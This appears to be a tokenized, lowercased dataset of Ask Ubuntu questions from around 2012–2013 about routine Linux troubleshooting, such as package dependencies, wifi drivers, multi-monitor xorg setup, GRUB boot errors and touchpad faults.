248312	apt tells me i have `` held broken packages '' : please help me reinstall skype	ubuntu version : up to date 12.04 i recently uninstalled skype so that i could reinstall the most recent version ; i was getting the `` packages held back '' message whenever i updated the software on my system and stupidly thought this was a good idea . the result is that now i can not get skype reinstalled because of broken packages/dependencies . i have tried installing the version i had installed ( 4.1.0.20.0-0ubuntu0.12.04.2 ) without success : # apt-get install skype=4.1.0.20.0-0ubuntu0.12.04.2 the following packages have unmet dependencies : skype : depends : skype-bin e : unable to correct problems , you have held broken packages . # apt-get install skype-bin=4.1.0.20.0-0ubuntu0.12.04.2 the following packages have unmet dependencies : skype-bin : i386 : depends : libqtwebkit4 : i386 ( > = 2.2~2011week36 ) but it is not installable e : unable to correct problems , you have held broken packages . the strange thing is that i have libqtwebkit4 version 2.2.1 installed : # dpkg -s libqtwebkit4 ( ... ) status : install ok installed ( ... ) version : 2.2.1-1ubuntu4 how can i fix this situation ? as far as i can tell i have a sufficiently recent libqtwebkit4 package installed yet apt wo n't let me install skype-bin . running aptitude search skype , i get : pi skype p skype : i386 v skype-bin pb skype-bin : i386
248317	cineraid cr-h458	has anyone used this external raid enclosure ? i would like to know if it is a true hardware controller meaning ubuntu would have no problem recognizing the array as one drive . thanks for any help !
248318	how do i block a certain package from being installed without disabling recommends ?	i want to blacklist the package ttf-mscorefonts-installer forever . how can i make sure upgrading my system will never install this package without disabling other `` recommends '' from being installed ? it must never be installed on my system and no attempt to install it must ever be made . the user should not need to decline the eula acceptance manually . no package manager must ever install it , no matter which one i use .
248319	how can i change the login screen ?	my login screen has changed automatically . i want to change it wants . where can i do it them ?
248320	hp probook over heating , shutting down	i 'm rather a amateur user . i have a single os - ubuntu 12.4 . lately my laptop ( hp probook 4530s ) heating up until it automatically shuts down . it was n't happening with the older ubuntu version . after that i started getting prompt messages that i do n't have enough disk space . thought it was somehow connected with the heating up , so started looking for solutions . and now i 'm totally lost and confused . this is how my partitions look at the moment : disk /dev/sda : 640.1 gb , 640135028736 bytes 255 heads , 63 sectors/track , 77825 cylinders , total 1250263728 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00043dcb device boot start end blocks id system /dev/sda1 * 2048 19531775 9764864 83 linux /dev/sda2 19533822 1250263039 615364609 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 19533824 27344895 3905536 82 linux swap / solaris /dev/sda6 27346944 1250263039 611458048 83 linux can someone give me a legit advice , since i 'm afraid my pc will just burn down anytime . thanks !
248323	how to re-enable lock screen ?	once i disabled the screen lock using a command that i ca n't remember . now i want to re-enable the screen lock ( via ctrl+alt+l ) but i do n't know how . if i look at system settings â brightness and lock the lock switcher is dimmed , how to enable it ?
248325	how do i gain acceess to a drive that owned by deleted user on ubuntu 11.10 ?	i did some trial on command line and creating a user account from it , then i logged off and logging to that newly created account ( let us call it newaccount ) . then i mounted one of my drive ( i named it as lossprop ) from it . after that , i returned to my account ( myaccount ) , and then deleted newaccount . but then i lost my permission to mount mydrive and i ca n't open it anymore . then i googling for a while , looking for a solution to fix it , i had tried sudo chown -r username : username /media/mydrive and using gui by nautilus in sudo mode . but still i ca n't change its owner , it still owned by newaccount which i had deleted it . how do i fix it ?
248330	toshiba c855d-s5302 wifi issue . wifi constantly dropping	i have installed 12.10 64 bit on my new toshiba and i 'm finding that the wifi is constantly dropping . i did manage to install the drivers from realtek 's site but i 'm having a problem where the connection is constantly dropping power . the signal meter goes from full to nothing while i 'm sitting in front of the router . and none of my other computers are having this issue . the system never shows the wifi as disconnected . description : wireless interface product : rtl8188ce 802.11b/g/n wifi adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 24 : ec:99 : b6:39:78 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8192ce driverversion=3.5.0-22-generic firmware=n/a ip=192.168.1.149 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:16 ioport:3000 ( size=256 ) memory : f0200000-f0203fff
248331	will ubuntu run on a system with asus p8z77-v deluxe motherboard	will ubuntu ( with latest stable kernel from source if neccessary ) run on a system with asus p8z77-v deluxe motherboard ? i could not find any hints by asus itself , but from the debian hardware database there are similar p8 motherboards with z77 chipset in the list . can anyone confirm that the other devices on the board are supported too ?
248332	how does one reset rhythmbox for a new library ?	previous similar questions have provided answers but the answers do n't work for ubuntu 12.04 and rhythmbox 2.98 . i have an sd card with an extensive music library . i have renamed unknown track titles to the correct track titles on the sd card with the file browser . i have also changed a different album with unknown track titles to the correct titles by editing rhythmbox properties . these are retained by rhythmbox but not changed on the sd card which still shows only the track number . i now want to reset the rhythmbox library to the edited sd card containing all the correct track titles . using answers from previous questions i have removed ~/.local/share/rhythmbox/rhythmdb.xml . i then import the new library on the sd card . titles renamed on the sd card with the file browser are not imported and titles changed by editing rythmbox properties are still there . no reset has occurred . i have also removed ~/.cache/rhythmbox as suggested in previous answers to no avail . previous answers also suggest removing ~/.gconf/apps/rhythmbox . this directory does no exist on ubuntu 12.04 . does anyone have any new ideas on how to reset the rhythmbox library with ubuntu 12.04 and rhythmbox 2.98 ?
248333	ubuntu software center is not working on ubuntu ( with kde desktop environment )	i 've just installed kde on ubuntu . but after installing it ubuntu software center is not installing or removing any softwares . it is giving a output something like this authentication error software ca n't be installed or removed because the authentication service is not available . ( org.freedesktop.policykit.error.failed : ( 'system-bus-name ' , { 'name ' : ':1.184 ' } ) : org.debian.apt.install-or-remove-packages one think i need to tell you that when i am switching to unity software center is working fine but when i am switching back to kde it is not working . please help me : ' ( i 've installed the package and tried the instruction but it did n't work . i also tried to use kubuntu software center but it is not working too : (
248334	how do i recover now zero-sized files ?	i had cut a few image files from a memory card to my ubuntu desktop . i then used a software namexif using wine to modify the names of the files . that was when my computer crashed for some time . when i restarted the computer , the files that i had tried modifying were all corrupt and occupied zero bytes of memory . how do i recover these files ?
248335	changing permission of /bin	i am doing a homework assignment for a class , and part of it is designing our own shell and read and write in low level . after forking , it needs to execute a command that a user inputs . when the execute tries to do it , it says that there is permission denied . i think getting access to the /bin while exevc ( `` /bin/ '' , argv ) is the problem . is there a way for my created shell get access to the /bin ? chmodding /bin is not allowed , according to outputs from the terminal .
248337	my os restarting repeatedly	i am using edubuntu 11.10 from last 2-3 months . i have been experiencing a problem since 2/3 weeks that when i am opening 2-3 pages in chromium or firefox , or working with any office tool , the os ( just os ) is restarting randomly , sometimes twice within a minute . it jumps , some writing coming on black screen ( unable to read , as it staying for fraction of second ) , and then going to log on screen . it neither restarting the pc as a whole , nor going to grub loader . just to help in identifying and informing about all the problems i noticed : i am using windows 7 in parallel with it on a dell inspirion 5010 bluetooth is not functioning properly too ( what i managed to read from that black screen , is the word `` bluetooth '' . ) my battery do run for 7-8 minutes on power
248340	how can i add drivers for the aopen xc cube to ubuntu 12.04 ?	i have an old aopen xccube machine and i can only get 800x600 to work on any of my monitors . this is the output from lspci | grep vgs vga compatible controller : silicon integrated systems [ sis ] 661/741/760 pci/agp or 662/761gx pcie vga display adapter is there anyway to install the drivers for this and get it to work ? or is there any other way to get the resolution higher ?
248342	can ubuntu ignore the wireless hardware switch ?	this is not the same question as many others have asked . i have a perfectly functioning wireless card and switch on my hp pavilion dv6910 , running ubuntu 12.04 . unfortunately , the placement of this switch causes me to hit it when the notebook is sitting on my lap . i 'm looking to disable the switch 's functionality to prevent disabling the wireless . is this possible ?
248355	can i run a dhcp server on an ubuntu vm under vmware and serve the host ?	i have windows 7 . i installed vmware workstation and then installed ubuntu on it . now i want to have a dhcp server on ubuntu and dhcp client on windows 7 . what should i do ? how should i configure ubuntu , vmware , and windows 7 ? please explain it clearly in detail and from very beginning .
248358	problems with aireplay-ng	i 'm trying to change the channel on monitoring mode interface mon0 but when i use it in aireplay-ng it says it 's not on the same channel with ap . i 've tried to change the channel with iwconfig mon0 channel # and still get the same message . i read a lot about that issue , and i 've found a patch which might eventually resolve the issue . the patch is called channel-negative-one-maxim.patch but i do n't know how to apply it . i 'm using ubuntu 12.04 x64 with gnome 3 . i did n't had that issue before , i think it just popped up after some update . can someone explain me how to apply that patch ? btw the driver of the wireless adapter is rt2800usb . ps . ok , now i 'm trying to restore rt2800usb driver , because i figured out how to install the newest driver , but it does n't work well with airodump-ng . i ca n't find package with the original rt2800usb driver atm .
248362	why do i get an error whenever i attempt to connect to a wireless network ?	this is the error that i get : failed to add/activate connection . ( 32 ) none of the registered plugins support add . all of the wireless networks around me appear in network manager and nm-tool yet i can not connect to any of them . i have a broadcom 4321 wireless adapter .
248370	unable to dual boot windows 8 and ubuntu 12.10	i can boot into either ubuntu or windows by manually selecting them from the bios and i boot with no trouble into ubuntu from grub but when i select `` windows 8 '' from grub i am greeted with the following : ca n't find command 'drivemap' invalid efi file path my basic setup : rampage iv motherboard 3x ssd ( 1 for windows , 1 for scratch space , 1 for ubuntu ) windows was installed first ubuntu was installed second i already tried running boot-repair twice , once from installed ubuntu , once from a live usb . the output of boot-repair : http : //paste.ubuntu.com/1577730/ any suggestions on how to get dual-boot working ? i think i 'm missing something obvious here .
248371	fetcher in currency converter ubuntu app	i saw in the ubuntu phone app tutorial that the fetcher in the currency converter is from ecb 's web page . do you know if that data can be legally used in a real app or web page ? i suspect that data from other pages such as yahoo finance ( they also have a currency converter among other things such as stock data ) ca n't be used because yahoo ! has stated on their web page that `` by accessing the yahoo ! site , you agree not to redistribute the information found therein. '' . i 'm sure that the ubuntu mobile os will be a great mobile os !
248374	software to manage my book collection	is there any software letting me manage my book collection and sync it with anobii or any other online reading community ? anobii is an online reading community built by readers for readers allowing you to shelve , find and share books . our mission is to bring book lovers together and encourage reading .
248376	screen does not wake up after hibernation	after running sudo pm-hibernate my computer starts working but screen remains black . my memory is 7.9 gib and my swap partition is 8 gib . what can i do to resolve it ?
248378	how do the various gnome flavours use the config resources they do or do not share ?	one of the things that has kept me away from gnome until now is the lack of a common , central place for configuration . this was bad in the old days , but after the advent of compiz , mutter and dconf , and the unofficial tweak utils ( gnome-tweak , ubuntu-tweak , unsettings , etc . ) , it 's even more confusing . especially when things do n't work as expected . some keyboard shortcuts are set in one place , some in others ; some are taken over from one vanilla gnome to unity , others seem to go unnoticed . maybe they conflict with some other setting , but there is no notification to that effect . etc . i 've also experienced , when playing around with different flavors of gnome ( gnome 2 , gnome 3 , unity , gnome shell , cinnamon , etc . ) , that sometimes changes in one of them will have no effect on the others -- sometimes they will mess them up completely ( or cause a revert to the default upon next login ) . so , to get to the question : can someone point me to a survey of how the various gnomes relate to each other -- to the various backends/systems , and to the configuration frontends ? which configurations in one ( say gnome shell ) will have effects on others ( say unity ) ?
248381	ubuntu live usb does n't boot on dell dell inspiron 17r	i am trying to boot an ubuntu 12.10 live usb on a dell inspiron 17r . however , after i boot from the usb , it briefly displays the red screen with keyboard and accessibility icon . it then goes to a black screen with an unmoving line in the top left hand corner . the computer is not making any sounds of activity , and the light on the usb is pulsing slowly , not blinking rapidly as it usually does when running ubuntu . how can i get my live usb to work the my computer ?
248384	can i restore my ubuntu deja dup to a lubuntu install ?	are ubuntu and lubuntu similar enough to use a deja dup of my home directory from ubuntu 12.04 to restore it to a different distro of ubuntu - specifically lubuntu 12.04 ? as i understand it there are differences beyond just the desktop environment and default apps , but i 'm not quite savvy enough to know fundamentally what they are .
248386	how do i change the maximum resolution of my computer for multiple monitors ?	i am trying to enable three monitors for my setup in ubuntu 12.10 . my card is a raedon 5700 hd series . when i try to extend my display to any additional monitors , i get the following error : required virtual size does not fit available size : requested= ( 3200 , 900 ) , minimum= ( 320 , 200 ) , maximum= ( 1600 , 1600 ) all i should have to do is increase my maximum resolution to a larger value . for example , let 's say that i had three monitors with 1600x900 resolution . i would need to change it to 4800x900 ( correct me if i 'm wrong ) . how would i go about doing this ? this is my xorg.conf file . i 'm not sure if i 'll need to edit this . i do n't even know where these values are stored . i 'm not very good with linux , so please try to explain in as simple terms as possible . section `` screen '' identifier `` default screen '' defaultdepth 24 endsection section `` module '' load `` glx '' endsection
248388	ubuntu toshiba dynadock u3.0	i am having a few issues with my new dynadock u3.0 . first of all , all of the usb connections are working as well as the usb ethernet . the only two issues i am having are with the usb audio and the usb displays . i am running ubuntu 12.10 on system 76 's newest lemur ultra . i will try to provide as much information as possible . right now i have connected to my dock : a razer mouse , logitech keyboard , oyen external hard drive . my displays are a panasonic , samsung and hannsg ( plugged in directly to laptop via hdmi ) and my speakers are an insignia . dillon @ lemur / $ lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 004 : id 2109:0811 bus 003 device 003 : id 5986:0401 acer , inc bus 004 device 003 : id 2109:0811 bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 005 : id 046d : c52b logitech , inc. unifying receiver bus 003 device 006 : id 2109:0811 bus 004 device 004 : id 17e9:4305 displaylink bus 004 device 006 : id 174c:55aa asmedia technology inc . bus 004 device 005 : id 2109:0811 bus 003 device 007 : id 1532:001c razer usa , ltd rz01-0036 optical gaming mouse [ abyssus ] dillon @ lemur / $ cat /proc/asound/cards 0 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xf7e10000 irq 46 1 [ u30 ] : usb-audio - dynadock u3.0 displaylink dynadock u3.0 at usb-0000:00:14.0-2.1 , super speed so for the sound i see that the sound card in the dynadock is recognized by my os , but the gui for managing sound does n't seem to pick it up . as for the displays i have no idea where to begin , i 've been researching , but nothing seems to work . i understand that you need a displaylink driver and that some exist for linux . i even read that the driver has been added to the linux kernel itself , but i have n't verified that . anyways , if there is anymore information that i need to give i will be glad to post here .
248390	ca n't install several development libraries	i ca n't install several packages . here 's what happened . i installed ubuntu 12.04 , added ppa : ricotz/testing and then upgraded to 12.10 . my system works fine , but apt-get build-dep gnome-terminal for example , does n't work : reading package lists ... done building dependency tree reading state information ... done the following packages have unmet dependencies : libgtk-3-dev : depends : libgtk-3-0 ( = 3.6.0-0ubuntu3.2 ) but 3.6.1-0ubuntu1~12.04~ricotz1 is to be installed depends : gir1.2-gtk-3.0 ( = 3.6.0-0ubuntu3.2 ) but 3.6.1-0ubuntu1~12.04~ricotz1 is to be installed depends : libpango1.0-dev ( > = 1.30.0 ) but it is not going to be installed depends : libcairo2-dev ( > = 1.10.0 ) but it is not going to be installed libgtk2.0-dev : depends : libpango1.0-dev ( > = 1.20 ) but it is not going to be installed depends : libcairo2-dev ( > = 1.6.4-6.1 ) but it is not going to be installed libvte-2.90-dev : depends : libcairo2-dev but it is not going to be installed depends : libpango1.0-dev ( > = 1.22.0 ) but it is not going to be installed e : build-dependencies for gnome-terminal could not be satisfied . exit 100 i no longer have ppa : ricotz/testing , it was disabled/removed when i upgraded , i think , but i still get a ton of errors .
248391	are there any known issues with deja-dup and ubuntu one ; notebly on restore ?	aloha , i am planning a backup routine . i am thinking of using deja-dup and placing the backup in the default ubuntu one folder . a while back i was making rsync backups and ran into problem when restoring . the rsync backup was setup to copy my home directory , and it copied the ~/.local/share/ubuntuone , which caused conflicts when i restored the system . re : https : //one.ubuntu.com/help/faq/im-setting-up-ubuntu-one-on-a-new-computer-or-re-installing-my-operating-system-how-should-i-do-this/ should i set deja-dup to ignore this folder on backup ? and are there any other concerns/issues with ubuntu one and deja-dup on backup and restore ? thank you .
248395	touchpad/trackpoint is overreacting	since i 've installed ubuntu i have problems with my touchpad . first under gnome/unity my touchpad was freezing for a couple of seconds with this dmesg-error : psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 1 ( only with the touchpad/trackpoint but not with my usb-mouse ) then some months later i changed from unity desktop to xfce-desktop & then to kde : my touchpad and trackpoint are either freezing for or are 'overreacting ' ( whole time till restart ) : when i touch the touchpad ( and trackpoint ) it clicks everything with a right or leftclick and the cursor goes 'crazy ' . dmesg : psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 1 psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 1 psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 1 psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 1 psmouse serio1 : touchpad at isa0060/serio1/input0 lost sync at byte 1 psmouse serio1 : issuing reconnect request psmouse serio1 : synaptics : device claims to have extended capabilities , but i 'm not able to read them . psmouse serio1 : synaptics : device claims to have extended capability 0x0c , but i 'm not able to read it . psmouse serio1 : synaptics : hardware appears to be different : id ( 149271-149271 ) , model ( 114865-114865 ) , caps ( d047b3-d047b1 ) , ext ( b40000-0 ) . psmouse serio1 : bad data from kbc - timeout i can not solve this problem with restarting xserver ( login-logut ) , i must restart ubuntu to get the touchpad working . but here my xorg log [ 37.683 ] ( ii ) loadmodule : `` synaptics '' [ 37.683 ] ( ii ) loading /usr/lib/xorg/modules/input/synaptics_drv.so [ 37.683 ] ( ii ) module synaptics : vendor= '' x.org foundation '' [ 37.684 ] ( ii ) using input driver 'synaptics ' for 'synps/2 synaptics touchpad' [ 37.684 ] ( ii ) synaptics : synps/2 synaptics touchpad : ignoring touch events for semi-multitouch device [ 37.684 ] ( -- ) synaptics : synps/2 synaptics touchpad : x-axis range 1472 - 5888 [ 37.684 ] ( -- ) synaptics : synps/2 synaptics touchpad : y-axis range 1408 - 4820 [ 37.684 ] ( -- ) synaptics : synps/2 synaptics touchpad : pressure range 0 - 255 [ 37.684 ] ( -- ) synaptics : synps/2 synaptics touchpad : finger width range 0 - 15 [ 37.684 ] ( -- ) synaptics : synps/2 synaptics touchpad : buttons : left right double triple [ 37.684 ] ( -- ) synaptics : synps/2 synaptics touchpad : vendor 0x2 product 0x7 [ 37.684 ] ( -- ) synaptics : synps/2 synaptics touchpad : touchpad found [ 37.684 ] ( ** ) synaptics : synps/2 synaptics touchpad : ( accel ) minspeed is now constant deceleration 2.5 [ 37.684 ] ( ** ) synaptics : synps/2 synaptics touchpad : maxspeed is now 1.75 [ 37.684 ] ( ** ) synaptics : synps/2 synaptics touchpad : accelfactor is now 0.036 [ 37.684 ] ( -- ) synaptics : synps/2 synaptics touchpad : touchpad found [ 8465.562 ] ( -- ) synaptics : synps/2 synaptics touchpad : touchpad found ( ee ) 3 : /usr/lib/xorg/modules/input/synaptics_drv.so ( 0xb6326000+0xcf65 ) [ 0xb6332f65 ] ( ee ) 4 : /usr/lib/xorg/modules/input/synaptics_drv.so ( 0xb6326000+0x6c75 ) [ 0xb632cc75 ] [ 8625.425 ] ( ii ) unloadmodule : `` synaptics '' i 'm using a thinkpad l420 with ubutnu 12.10 . ( new kernel/all up to date . ) i have tested a lot of things like set with gpointing-device-settings the lowest acceleration but i wo n't work for me . any ideas how to solve this problem ?
248398	i have two wallpapers ( side by side ) on one screen . help !	i have been messing around with my ubuntu , i had duplicated my screen to show up on my tv . after this i decided to just go back to my laptop screen , ubuntu did this , however , ubuntu now shows two wallpapers side by side on my laptop screen . so for example i can drag the chrome browser all the way to the far right of the second wallpaper screen . my resolution is 1920 x 1080 , so this set up gives me two wallpapers side by side with this resolution . i do n't want this , has anybody any idea on how to fix this issue . to be clear , i am only wanting the normal one screen wallpaper . thanks for any help . asim
248399	the program 'rails ' is currently not installed	i have installed ubuntu 12.04 on virtualbox . i installed rvm , ruby and rails following this tutorial . but when i restart , i am getting this error : the program 'rails ' is currently not installed . you can install it by typing : sudo apt-get install rails and after that , when i again try gem install rails i am getting this error : error : while executing gem ... ( errno : :eacces ) permission denied - /var/lib/gems and there is no gems folder under /var/lib/ . can anyone help me to fix this ?
248400	ubuntu permissions to open files	my macbook pro hard drive is not working and i do n't have a backup cd . i installed ubuntu to see if i could access my files . i can see the folders but when i attempt to open them , i get a message that i do not have permission to view them . how can i get the required permission ? i tried right click > > properties > > permissions and the drop down menus are grey so i do n't have the option to change them to read and write . is there anything i can do to access the files ?
248404	is there any difference between apache2 and httpd ?	today i was installing phpmyadmin on ubuntu 12.04 and after a while a dialogue poped stating what server i want to use ( apache2 and httpd ) . are these two , two different kind of server ?
248411	how can i move the dash home button up to that space in the image ?	i have seen several screenshots where the dash home button is not on the side bar ... but on the panel . like in this image : how can i do the same and move it up there ?
248424	how to get out of grub error and stop it from happening again ?	i have a windows 8 laptop . i ran ubuntu through a live usb and installed it ( secure boot does n't let wubi otherwise ) . when i used boot repair to boot back into windows , it worked . i restarted to go back to ubuntu , but it showed this : error : unknown filesystem . grub rescue > no matter what i try from other threads i can not go back to windows 8 or ubuntu . i even put the usb back in , but nothing happened .
248427	ubuntu wont recognize my internal hdd	i ran the windows installer with windows 7 . i assumed ubuntu would run my windows files , but my 1.5tb internal hard drive wo n't mount . any help would be awesome !
248434	how do i add an unallocated partition to another partition	how can i add space from unallocated to extended ? can someone please simplify the process ? i have no idea what to do . i just deleted my windows partition and i want to add it to my ubuntu one . also what is the middle partition used for ? because when i boot now , i get options to do linux , or generic , or x86 and stuff . is that safe to delete ?
248438	copy text in libre office writer	if i have a writer document that is a numbered list of instructions , and i highlight a chunk of text , or even just a single word in a line of the list , and copy it to the clipboard , go to another program , i.e . gedit , and paste the copied text , the number of the item/line that the text was originally copied from gets pasted as well , even if it was not highlighted to copy . can this behavior be changed ?
248443	starting teamviewer on a server without screen	i try to start teamviewer on a server without screen : export display=:0 < br > /opt/teamviewer8/tv_bin/script/teamviewer the result is : application tried to create a window , but no driver could be loaded . make sure that your x server is running and that $ display is set correctly . wine : unhandled page fault on read access to 0x0000008c at address 0x7d8e197a ( thread 0009 ) , starting debugger ... err : seh : start_debugger could n't start debugger ( `` winedbg -- auto 8 5332 '' ) ( 2 ) read the wine developers guide on how to set up winedbg or another debugger* i do n't get it because on one of my servers without monitor , i could start teamviewer without a problem . if i type xrandr : screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 4096 x 4096 vga-1 disconnected ( normal left inverted right x axis y axis ) dvi-i-1 disconnected ( normal left inverted right x axis y axis ) and xvfb is n't even installed ! so how does it work that latter server and not on the one i try to configure ? on the one i try to configure xrandr says : ca n't open display ps : i know that there are alternatives to teamviewer but i want to try to make this one working anyway : - ) thank you for any help !
248444	linksys ae3000 how to work around ?	i have a linksys ae3000 dual-band wireless-n usb adapter . i need it to work for my ubuntu 12.04 . i have looked up how to work around the fact that cisco did n't supply a linux driver but i 'm quite new to ubuntu ( a couple of days in fact ) so they have n't helped all that much . i have wine and ndiswrapper downloaded .
248447	how do i enable a third display with my setup ?	i 've been able to extend my monitor onto two displays at once , but i ca n't get it to work with three . when i use the system settings > display , it gives me the following error when i try to output to the third display : the selected configuration for displays could not be applied requested position/size for crtc 148 is outside the allowed limit : position= ( 3200 , 0 ) , size= ( 1920 , 1080 ) , maximum= ( 3200 , 3200 ) i know it is possible to extend my display to all three , as i was able to do it in linux mint . here 's the output of xrandr : screen 0 : minimum 320 x 200 , current 3200 x 1080 , maximum 3200 x 3200 lvds connected 1600x900+0+0 ( normal left inverted right x axis y axis ) 382mm x 215mm 1600x900 60.1*+ 1440x900 60.1 1280x768 60.1 1280x720 60.1 1024x768 60.1 1024x600 60.1 800x600 60.1 800x480 60.1 640x480 60.1 dfp1 connected ( normal left inverted right x axis y axis ) 1920x1080 60.0 + 59.9 30.0 30.0 24.0 30.0 30.0 24.0 1776x1000 59.9 24.0 30.0 30.0 1680x1050 60.0 59.9 30.0 24.0 30.0 24.0 1400x1050 60.0 59.9 30.0 24.0 30.0 24.0 1600x900 59.9 24.0 30.0 1280x1024 60.0 30.0 24.0 1440x900 59.9 24.0 30.0 1280x960 60.0 30.0 24.0 1360x768 60.0 30.0 24.0 1152x864 60.0 30.0 24.0 1280x768 60.0 30.0 24.0 1280x720 60.0 59.9 30.0 24.0 1024x768 30.0 24.0 60.0 1152x648 59.9 1024x600 30.0 24.0 60.0 800x600 30.0 24.0 60.3 800x480 30.0 24.0 60.3 720x480 30.0 24.0 60.0 59.9 640x480 30.0 24.0 60.0 59.9 crt2 connected 1600x900+1600+0 ( normal left inverted right x axis y axis ) 443mm x 249mm 1600x900 60.0*+ 1280x1024 75.0 60.0 1440x900 59.9 1280x960 60.0 1280x800 59.8 1152x864 75.0 60.0 1280x768 59.8 1280x720 59.8 1024x768 75.0 70.1 60.0 1024x600 75.0 70.1 60.0 800x600 72.2 75.0 60.3 56.2 800x480 72.2 75.0 60.3 56.2 640x480 75.0 72.8 67.0 59.9 and here 's my xorg.conf file : section `` serverlayout '' identifier `` amdcccle layout '' screen 0 `` amdcccle-screen [ 1 ] -0 '' 0 0 endsection section `` monitor '' identifier `` 0-lvds '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1600x900 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` monitor '' identifier `` 0-dfp1 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1920x1080 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 3200 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` monitor '' identifier `` 0-crt2 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1600x900 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 1600 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` device '' identifier `` amdcccle-device [ 1 ] -0 '' driver `` fglrx '' option `` monitor-lvds '' `` 0-lvds '' option `` monitor-dfp1 '' `` 0-dfp1 '' option `` monitor-crt2 '' `` 0-crt2 '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' virtual 8192 1080 modes `` 1600x900 '' endsubsection endsection section `` screen '' identifier `` amdcccle-screen [ 1 ] -0 '' device `` amdcccle-device [ 1 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 virtual 3200 3200 depth 24 endsubsection endsection i would be extremely thankful for any help : ) edit : i 'm running ubuntu 12.04 , and my graphics card is a raedon 5700hd series .
248450	nvidia control function key with xbacklight	i aways had problems with nvidia brightness control , and since 2009 i use the nvidiabl . but there is a issue that brightness sometimes came back to full backlight . so , since the nvidia is with new driver release i 'm trying others options and the xbacklight worked very well . but i cant change it with the function keys ( nvidiabl can ) . i can create a shortcut in compiz , but is not the same , i want to `` connect '' with the default brightness control from ubuntu ( with the notification ) . how i could do that ?
248452	ubuntu default desktop not working	i just installed ubuntu 12.10 after a while without use linux frequently . as i needed to install cuda programming toolkit ( i have a cuda enabled gpu ) i downloaded the installer from nvidia website . well , when i tried to install it , the installer asked me to update my gpu driver , which i did . but , when it tried to do so , i got a fail message , for they required stopping x-server in order to so . i searched the internet for the command in order to stop x-server . i did it . installed the driver . but , when i restarted the server , i simply did not see my desktop correctly . i just could see the desktop background image and the icons , but neither the unity bar or the top bar , that is , i could do nothing . now i am using it on gnome classic ( the login screen is working properly so that i can choose between gnome classic and ubuntu default ) . i really do n't understand how so simple procedures can cause us so many troubles ! does anybody have any idea of what may be happening ? ? p.s . : although i have seen similar questions , i have n't been succeed in solving my problem . i tried all the answers in this question . unity does n't load , no launcher , no dash appears what i got ? nothing . just the same problem . only my desktop and the icons on it are showed . i have even tried reinstall unity plugin . no solution at all .
248455	restore gui workspaces	i accidentally press ctrl + alt + f4 while i was doing normal tasks in my ubuntu 12.10 . the key combination took me to console ui . from the console , i logged in and did startx but the output gui did n't show up with dash , launcher or anything ( just background wallpaper ) . how i can restore my original gui with all my working applications opened ?
248456	`` no such file or directory '' , but the file exists	i copied some files to ubuntu ( running on virtualbox ) . trying to open the said copied files and get an error . i 'm not entirely sure how the file directory system works , but i used cp command to copy one of the files . is ( and other files that were just copied into the folder manually ) shows up in the right folder with ls command . but when i try to execute the file , i get the following error : qiime @ qiime-virtualbox : ~ $ usr/bin/varscore_pipeline -bo desktop/shared_folder/varscore/c_albicans.fasta desktop/shared_folder/varscore/tmp/poo.csv bash : usr/bin/varscore_pipeline : usr/bin/python2.6 : bad interpreter : no such file or directory when i run the ls /usr/bin/ command i can see the file varscore_pipeline in there , so i 'm not sure what is wrong .
248459	wireless mouse driver wo n't work with my microsoft mobil 4000 mouse	i installed ubuntu 10.4 amd 64 today but the drivers for the mouse are terrible , the cursor moves so slow it 's not usable . i 've tried setting the speed of the mouse to top speeds but it did n't help at all . any suggestions as to what i can do ? linux newbe here . thanks .
248462	how to report or block an inappropriate application in the ubuntu software centre ?	while browsing through the ubuntu software center i noticed a publication that i think is inappropriate . is there is a way to report possibly inappropriate applications ?
248463	why does n't cheese not allow for multiple effects to be selected at the same time ?	for some reason in cheese on my 12.10 ubuntu box , it seems i can not choose multiple effects . is this a bug or what ?
248464	rhythmbox `` can not resolve proxy hostname '' error	i keep getting can not resolve proxy hostname . have no idea what this means ca n't find directions for ubuntu 12.04 and rhythmbox to correct . i need simple step by step instructions
